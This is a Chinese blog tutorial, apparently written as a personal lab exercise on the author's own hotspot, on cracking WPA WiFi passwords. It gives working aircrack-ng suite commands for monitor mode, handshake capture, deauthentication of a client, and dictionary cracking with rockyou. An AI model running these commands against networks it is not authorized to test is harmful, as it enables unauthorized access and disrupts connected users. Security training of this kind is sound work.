无线网络,是指无需布线就能实现各种通信设备互联的网络。无线网络技术涵盖的范围很广,既包括允许用户建立远距离无线连接的全球语音和数据网络,也包括为近距离无线连接进行优化的红外线及射频技术。根据网络覆盖范围的不同,可以将无线网络划分为无线广域网(WWAN:Wireless Wide Area Network)、无线局域网(WLAN:Wireless Local Area Network)、无线城域网(WMAN:Wireless Metropolitan Area Network)和无线个人局域网(WPAN:Wireless Personal Area Network)。-->来自百度百科

准备阶段-插入网卡后,选择添加到虚拟机,iwconfig可以看到多出一个wlan 0网卡;

image-20210623165202005

image-20210623141654227

image-20210623141732819.png

激活网卡

airmon-ng start wlan0  

image-20210621134235633

这个时候iwconfig可以看见已经激活

image-20210621170502179

探测阶段-利用网卡搜索周围能获取到WiFi的信息,这里以及下面的所有抓包阶段都是按两次q退出,不要强制退出。

airodump-ng wlan0mon

image-20210623153734019.png

抓包阶段-利用airodump

这里选择了我的热点,这里需要注意的是我们设置保存的文件名是zcc,但是生成的文件却不是zcc.ivs,而是zcc-01.ivs。

airodump-ng --ivs --bssid D6:D0:40:0B:72:7E -w zcc -c 8 wlan0mon

image-20210623154856801.png

image-20210623154911565

其中2C:DB:07:84:9A:6D是我的本机,他链接到了D6:D0:40:0B:72:7E这个网络内。

这里也可以抓取CAP包,可以看见他生成了好几个文件,其中有CAP包:

airodump-ng -c 8 -w /root/Desktop/ --bssid D6:D0:40:0B:72:7E wlan0mon

image-20210623155910620

攻击阶段-aireplay(谨记:开新窗口运行)

此处需要新开一个shell

aireplay-ng -0 1 -a D6:D0:40:0B:72:7E -c 2C:DB:07:84:9A:6D wlan0mon

image-20210623160528419

当出现WPA handshake:D6:D0:40:0B:72:7E时,说明抓包完成,获取到了wifi包的加密秘钥(前提条件是有机子连接这个wifi);

image-20210623161742446

收集阶段-字典攻击CAP(字典收集)

(1)使用kali自带密钥字典:

• cd /usr/share/wordlists/
• gzip -d rockyou.txt.gz

image-20210623163400229

(2)导入本地的密码本

image-20210623163131556.png

破解阶段-aircrack破解

(1)ivs数据包爆破

aircrack-ng -w password.txt zcc-01.ivs

image-20210623163542796

KEY FOUND!后面中括号中就是WiFi密码。

(2)破解cap包情况

aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/Desktop/-01.cap

image-20210623163937930

成功破解!

最后修改:2021 年 07 月 11 日 10 : 13 PM
如果觉得我的文章对你有用,请随意赞赏